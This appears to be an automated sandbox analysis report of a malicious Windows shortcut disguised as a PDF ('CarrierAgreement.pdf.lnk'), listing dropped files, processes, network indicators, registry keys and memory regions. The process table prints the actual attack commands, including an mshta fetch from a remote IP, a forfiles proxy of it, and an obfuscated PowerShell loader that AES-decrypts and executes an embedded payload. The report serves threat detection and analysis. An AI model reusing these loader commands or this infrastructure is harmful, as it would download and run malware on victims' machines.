Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
CarrierAgreement.pdf.lnk.mal.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon
number=13, Archive, ctime=Sat May 8 07:13:59 2021, mtime=Sat May 8 07:13:59 2021, atime=Sat May 8 07:13:59 2021, length=41472,
window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x2c7ff45c, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
OpenPGP Secret Key
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\72923df5-4484-4223-a828-d46d5a1289cf.tmp
|
JSON data
|
modified
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-240702105240Z-170.bmp
|
PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4,
UTF-8, version-valid-for 15
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8,
version-valid-for 25
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\carrieragreement[1]
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI96187.LOG
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arshfxs5.aak.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cs4jgdzg.dvh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lufdbitb.svv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n3t1oulb.31i.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-07-02 06-52-38-030.log
|
ASCII text, with very long lines (393)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
|
ASCII text, with very long lines (393), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\09efd7f1-21b6-4bc0-9f71-f075e8450d2d.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\2fb5ef8c-a409-43f3-8223-dee2fcd0025b.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\38a425ff-ec17-4f73-b4f2-d8e1326c1dca.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\cac93c2a-5ddf-41d9-8f30-49f4c400698f.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\agreement.pdf
|
PDF document, version 1.5, 2 pages
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 46 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
. mshta http://92.118.112.135/carrieragreement
|
|
|
|
C:\Windows\System32\mshta.exe
|
"C:\Windows\system32\mshta.exe" http://92.118.112.135/carrieragreement
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function aaTynIUh($PiQE){return -split
($PiQE -replace '..', '0x$& ')};$VuCCamL = aaTynIUh('E5A55824D9EAF8A8C3514E39CEDEF30B918A2A1589DF287752B8D027F1DFBF83EE12DB088588624EC45E743D432DCA79C93A71346B475008579989A09F5D98E1D33138882FF475A777BFA374EB0BFD6A0B25AA253A05AF641E20F4C77FC5CD0BE786B5EAA1F37060C9B9C4DA610ABA833E1A608F90B5E6B8D0C72A052CE081AB6CEF4890ABA76C1939DBFDD7FC25ACC315BBF81EE00ED5787C37F8EC15BBBDC9534009AE0B1FAA407C742099126C7FD0D4FE48ED239BE661785C96903D2AED48751F6A32EA8FFA5B259E531FDE2EBF959342027F3F21889F4103EF93280E2115E8BCEF81D14F8F1D89FF8A475B2F2B6767EDC2491A188CC66BF8A2D116BBD2EDADACC2568D9E03C1330B480BB24242F43AF308990B03DE2465DE44C087B8FDB79C2730BDA7EF8701F2098485DEDB88534CEB321A754FAF5DFF2DFCE6F9109288BE3A78B858A0BAED175DE2205F8F17399B26D860EF1D36E319889DDF54024D57413E8ED3BEE8124C99DC0646E86AF2E54A5DEBC68B17BE7F7790E239CC2289250802915B60ED57ECB3427EAA9BE75B0D811C4C5B5A1BC67E8A4E562AF8BB426F451AD03756F2DA6C85FD25754E21264E99ADB5CBE785D577DF55A5CFC65B2968F737477CC6D303C6B6AE4ADD6B71C05EF67DE56A89B1959E503669C7B27D1EB3EB0609B8D7F9D259D985807288297EFEF04CF7B98A19BBE5FEBF808E5D0B15E790F44431D0F52E70C27ECA747B9168AACC8B7730C50B98B31A5E95CF43E58AB8DA6BF46550035D830DBF8CE8A450849D09E261020820A3C898AC6BC7CA589994D1A7BC6CBB01495D1CA57D60B1E68AF9D1E53C5BD5310153FC3E2B8DFD9D910AA312BC6C305AA7DE3E6C1D1689D0E1B54ECBA688DB6977B50F8ADB1C843896B619A4C1C88BC05BA171BAF12FB0751D9425C26258CBB29B82CA964FDCFBB779D338C140E4B54AD473109871DA665A1028B5489F2936C002C23995EAAD75FAEC7D1C23658D72E5BCA801DBF50A83D1585FB03487AACBE213CBFBAF54DDF43E0CC1780607030370FD254E6D185EC019BED40DF3A26364E22144A3A2AB186D06DF0AF4FE35CA93D05915D6D6D7D3C7A54F25E18421320862CE1CC9B0C7B510C13A30A01950668FE380F154C133E73AB0E0C92A044F3669BE276DD745D220149675000E09D63EE960879409BFEDEDA3483BC1079257FCEC92518331731EBF09B0068461A60C6FE5450A668155187769B3714F8674259AE2383B26BFC047B3345B4B1A2E81BC4ACC879B282641BEA83118BD16A91C3FB040349F9A220F52F0A904E971C68A8B7AE7F5860034B22033F31CAF74B121D6F0672EDF133C9764CF0B79274ADA57554D5617BDEB924FDD1A69B7BCA18D34E108B89C42EAF960A2FE309D50F3E17C6EC586E0EF4646E2D418053C151C42EA1E041F414D94AAEC7DCA3D6086FEFF2D608A4D5DEA1B781AEA3109FCF4EF60DBA03DCB649FE16896B50AED1F8D5319155B11B14787101FA727118B88D50589B74206D84CD45A5FFF0653B0DC3265B92186DA8EAE07E65D0B6F1F9562421931175ADCDB8346280E92044D6DF6C3D7D6C52C1B0961211A8CD2138E79D9387D320F595E3DFFAC8D1B0D2636413271E4DC4BF7316364061FF4C0A348C05FDFAAE265E971340F850E916C6EDEF9420625A4401A18306FFA9047A91CDEAD91F699FE8D0055E27192A17C38DCBCEA41A83C4E3158F4D0F8634F43AC1CAAE822B7E6');$VTjxj
= [System.Security.Cryptography.Aes]::Create();$VTjxj.Key = aaTynIUh('7566656A62656D6D6241736C57716B6A');$VTjxj.IV = New-Object
byte[] 16;$paOghKFl = $VTjxj.CreateDecryptor();$EkiGvPGrs = $paOghKFl.TransformFinalBlock($VuCCamL, 0, $VuCCamL.Length);$NvSFUKzSO
= [System.Text.Encoding]::Utf8.GetString($EkiGvPGrs);$paOghKFl.Dispose();& $NvSFUKzSO.Substring(0,3) $NvSFUKzSO.Substring(3)
|
|
|
|
C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe
|
"C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe"
|
|
|
|
C:\Windows\System32\forfiles.exe
|
"C:\Windows\System32\forfiles.exe" /p C:\Windows /m win.ini /c "powershell . mshta http://92.118.112.135/carrieragreement"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\agreement.pdf"
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService
--lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0"
--lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log"
--mojo-platform-channel-handle=2088 --field-trial-handle=1648,i,191609744094753054,4714144036431359762,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker
/prefetch:8
|
There are 1 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://aplointexhausdh.xyz/
|
unknown
|
|
|
|
https://panameradovkews.xyz/api
|
unknown
|
|
|
|
radiationcommentwks.xyz
|
|
||
|
https://aplointexhausdh.xyz/apiH0
|
unknown
|
|
|
|
http://92.118.112.135/agreement.pdf
|
92.118.112.135
|
|
|
|
https://proffyrobharborye.xyz/apiyz
|
unknown
|
|
|
|
https://depositybounceddwk.xyz/60
|
unknown
|
|
|
|
http://92.118.112.135/carrieragreement
|
92.118.112.135
|
|
|
|
https://panameradovkews.xyz/z/w0
|
unknown
|
|
|
|
https://panameradovkews.xyz/pi
|
unknown
|
|
|
|
https://proffyrobharborye.xyz/A0
|
unknown
|
|
|
|
depositybounceddwk.xyz
|
|
||
|
https://panameradovkews.xyz/Z0?
|
unknown
|
|
|
|
proffyrobharborye.xyz
|
|
||
|
aplointexhausdh.xyz
|
|
||
|
compilecoppydkewsw.xyz
|
|
||
|
https://depositybounceddwk.xyz/e0
|
unknown
|
|
|
|
https://proffyrobharborye.xyz:443/api
|
unknown
|
|
|
|
https://panameradovkews.xyz:443/api
|
unknown
|
|
|
|
https://proffyrobharborye.xyz/
|
unknown
|
|
|
|
https://panameradovkews.xyz/
|
unknown
|
|
|
|
https://proffyrobharborye.xyz/l0-
|
unknown
|
|
|
|
manufactiredowreachhd.xyzu
|
|
||
|
https://aplointexhausdh.xyz/api
|
unknown
|
|
|
|
https://slammyslideplanntywks.xyz/
|
unknown
|
|
|
|
https://depositybounceddwk.xyz/~0
|
unknown
|
|
|
|
https://panameradovkews.xyz/$0
|
unknown
|
|
|
|
slammyslideplanntywks.xyzu
|
|
||
|
https://panameradovkews.xyz/apiYd
|
unknown
|
|
|
|
exertcreatedadnndjw.xyz
|
|
||
|
https://proffyrobharborye.xyz/api
|
unknown
|
|
|
|
panameradovkews.xyz
|
|
||
|
https://aplointexhausdh.xyz/apihd
|
unknown
|
|
|
|
https://depositybounceddwk.xyz/
|
unknown
|
|
|
|
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
|
unknown
|
||
|
http://repository.certum.pl/ctsca2021.cer0A
|
unknown
|
||
|
http://crl.certum.pl/ctsca2021.crl0o
|
unknown
|
||
|
http://92.118.112.135/carrieragreementles(x86)=C
|
unknown
|
||
|
http://ccsca2021.crl.certum.pl/ccsca2021.crl0s
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
|
http://repository.certum.pl/ccsca2021.cer0
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod.C:
|
unknown
|
||
|
http://92.118.112.135/carrieragreementl;
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2
|
unknown
|
||
|
http://subca.ocsp-certum.com05
|
unknown
|
||
|
http://92.118.112.135/carrieragreementC:
|
unknown
|
||
|
http://subca.ocsp-certum.com02
|
unknown
|
||
|
http://92.118.112.135/carrieragreementeLMEMP
|
unknown
|
||
|
http://subca.ocsp-certum.com01
|
unknown
|
||
|
http://crl.certum.pl/ctnca2.crl0l
|
unknown
|
||
|
http://repository.certum.pl/ctnca2.cer09
|
unknown
|
||
|
http://ccsca2021.ocsp-certum.com05
|
unknown
|
||
|
http://92.118.112.135/carrieragreement2
|
unknown
|
||
|
http://92.118.112.135/carrieragreement0
|
unknown
|
||
|
http://92.118.112.135/carrieragreementlper.dllV
|
unknown
|
||
|
http://www.certum.pl/CPS0
|
unknown
|
||
|
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
|
unknown
|
||
|
http://92.118.112.135/carrieragreementhttp://92.118.112.135/carrieragreement
|
unknown
|
||
|
http://repository.certum.pl/ctnca.cer09
|
unknown
|
||
|
http://92.118.112.135/carrieragreementS
|
unknown
|
||
|
http://crl.certum.pl/ctnca.crl0k
|
unknown
|
||
|
http://92.118.112.135/carrieragreementH
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://www.certum.pl/CPS0
|
unknown
|
||
|
http://92.118.112.135/carrieragreement$global:?
|
unknown
|
||
|
http://92.118.112.135/carrieragreementt
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
|
unknown
|
||
|
http://92.118.112.135/carrieragreement~
|
unknown
|
||
|
https://radiationcommentwks.xyz/apie
|
unknown
|
||
|
http://92.118.112.135/carrieragreement...
|
unknown
|
||
|
http://92.118.112.135/carrieragreemente
|
unknown
|
||
|
http://92.118.112.135/carrieragreementLE_STRING=I1
|
unknown
|
||
|
http://92.118.112.135/carrieragreementc
|
unknown
|
||
|
https://radiationcommentwks.xyz/api
|
unknown
|
There are 64 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
panameradovkews.xyz
|
unknown
|
|
|
|
radiationcommentwks.xyz
|
unknown
|
|
|
|
proffyrobharborye.xyz
|
unknown
|
|
|
|
aplointexhausdh.xyz
|
unknown
|
|
|
|
compilecoppydkewsw.xyz
|
unknown
|
|
|
|
depositybounceddwk.xyz
|
unknown
|
|
|
|
exertcreatedadnndjw.xyz
|
unknown
|
|
|
|
slammyslideplanntywks.xyz
|
unknown
|
|
|
|
manufactiredowreachhd.xyz
|
unknown
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
92.118.112.135
|
unknown
|
Russian Federation
|
|
|
|
96.17.64.189
|
unknown
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
|
There are 8 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
23A0000
|
direct allocation
|
page read and write
|
|
|
|
14635F40000
|
trusted library allocation
|
page read and write
|
||
|
79E000
|
heap
|
page read and write
|
||
|
28821401000
|
trusted library allocation
|
page read and write
|
||
|
620000
|
heap
|
page read and write
|
||
|
1463A78A000
|
trusted library allocation
|
page read and write
|
||
|
1463A7B8000
|
trusted library allocation
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A344C76000
|
heap
|
page read and write
|
||
|
4B7000
|
unkown
|
page readonly
|
||
|
2A347DF0000
|
trusted library allocation
|
page read and write
|
||
|
2A344A2A000
|
heap
|
page read and write
|
||
|
2A344C2D000
|
heap
|
page read and write
|
||
|
1463A7C1000
|
trusted library allocation
|
page read and write
|
||
|
2A344A30000
|
heap
|
page read and write
|
||
|
2A344C54000
|
heap
|
page read and write
|
||
|
2A349096000
|
trusted library allocation
|
page read and write
|
||
|
8E4E37E000
|
stack
|
page read and write
|
||
|
2A344C3F000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
28821E01000
|
trusted library allocation
|
page read and write
|
||
|
1463A8E3000
|
heap
|
page read and write
|
||
|
2A344C3F000
|
heap
|
page read and write
|
||
|
7047FC000
|
stack
|
page read and write
|
||
|
2A3444A0000
|
trusted library allocation
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
29B429BE000
|
heap
|
page read and write
|
||
|
7A1000
|
heap
|
page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
8E4E77E000
|
stack
|
page read and write
|
||
|
2A348BD7000
|
heap
|
page read and write
|
||
|
2A344750000
|
heap
|
page read and write
|
||
|
2A348BEE000
|
heap
|
page read and write
|
||
|
1463A8F4000
|
heap
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2880F003000
|
trusted library allocation
|
page read and write
|
||
|
2A347E50000
|
trusted library allocation
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344A39000
|
heap
|
page read and write
|
||
|
2A344C7B000
|
heap
|
page read and write
|
||
|
2A344C3E000
|
heap
|
page read and write
|
||
|
7056FE000
|
stack
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
7048FE000
|
unkown
|
page readonly
|
||
|
8E4DF0E000
|
stack
|
page read and write
|
||
|
2A344C82000
|
heap
|
page read and write
|
||
|
2750000
|
heap
|
page read and write
|
||
|
703B5B000
|
stack
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
2A344C3C000
|
heap
|
page read and write
|
||
|
2A344A25000
|
heap
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
2A344ABE000
|
heap
|
page read and write
|
||
|
14635A00000
|
heap
|
page read and write
|
||
|
2A344C81000
|
heap
|
page read and write
|
||
|
2A344C0E000
|
heap
|
page read and write
|
||
|
795000
|
heap
|
page read and write
|
||
|
2A344A99000
|
heap
|
page read and write
|
||
|
2A344C82000
|
heap
|
page read and write
|
||
|
2A344C7E000
|
heap
|
page read and write
|
||
|
2A344A39000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
2A344C4A000
|
heap
|
page read and write
|
||
|
4B5000
|
unkown
|
page write copy
|
||
|
2A344A11000
|
heap
|
page read and write
|
||
|
761000
|
heap
|
page read and write
|
||
|
14635880000
|
trusted library allocation
|
page read and write
|
||
|
2A347DD3000
|
trusted library allocation
|
page read and write
|
||
|
8E4E7FE000
|
stack
|
page read and write
|
||
|
2A344B34000
|
trusted library allocation
|
page read and write
|
||
|
2A348EF0000
|
trusted library allocation
|
page execute
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
704BFB000
|
stack
|
page read and write
|
||
|
704CFE000
|
unkown
|
page readonly
|
||
|
29B42810000
|
heap
|
page read and write
|
||
|
2A348FEB000
|
trusted library allocation
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
10AE7B000
|
stack
|
page read and write
|
||
|
29B429BE000
|
heap
|
page read and write
|
||
|
2A344A01000
|
heap
|
page read and write
|
||
|
29B42874000
|
heap
|
page read and write
|
||
|
14635313000
|
heap
|
page read and write
|
||
|
778000
|
heap
|
page read and write
|
||
|
7043FE000
|
stack
|
page read and write
|
||
|
9E13AFC000
|
stack
|
page read and write
|
||
|
2A344C3D000
|
heap
|
page read and write
|
||
|
2A344C41000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
14635302000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
7051FE000
|
unkown
|
page readonly
|
||
|
1463A8C8000
|
heap
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
9E13BFF000
|
stack
|
page read and write
|
||
|
2A344C3A000
|
heap
|
page read and write
|
||
|
1463A6D0000
|
trusted library allocation
|
page read and write
|
||
|
2A344C44000
|
heap
|
page read and write
|
||
|
2741000
|
heap
|
page read and write
|
||
|
29B4289F000
|
heap
|
page read and write
|
||
|
29B427F9000
|
heap
|
page read and write
|
||
|
2880EDAE000
|
trusted library allocation
|
page read and write
|
||
|
2A344C7C000
|
heap
|
page read and write
|
||
|
1463A73F000
|
trusted library allocation
|
page read and write
|
||
|
1FFE9F90000
|
heap
|
page read and write
|
||
|
2A344550000
|
heap
|
page read and write
|
||
|
2A344C4B000
|
heap
|
page read and write
|
||
|
2A344C2A000
|
heap
|
page read and write
|
||
|
29B42830000
|
heap
|
page read and write
|
||
|
2A344A39000
|
heap
|
page read and write
|
||
|
2A344C82000
|
heap
|
page read and write
|
||
|
2A344578000
|
trusted library allocation
|
page read and write
|
||
|
2A3490B0000
|
trusted library allocation
|
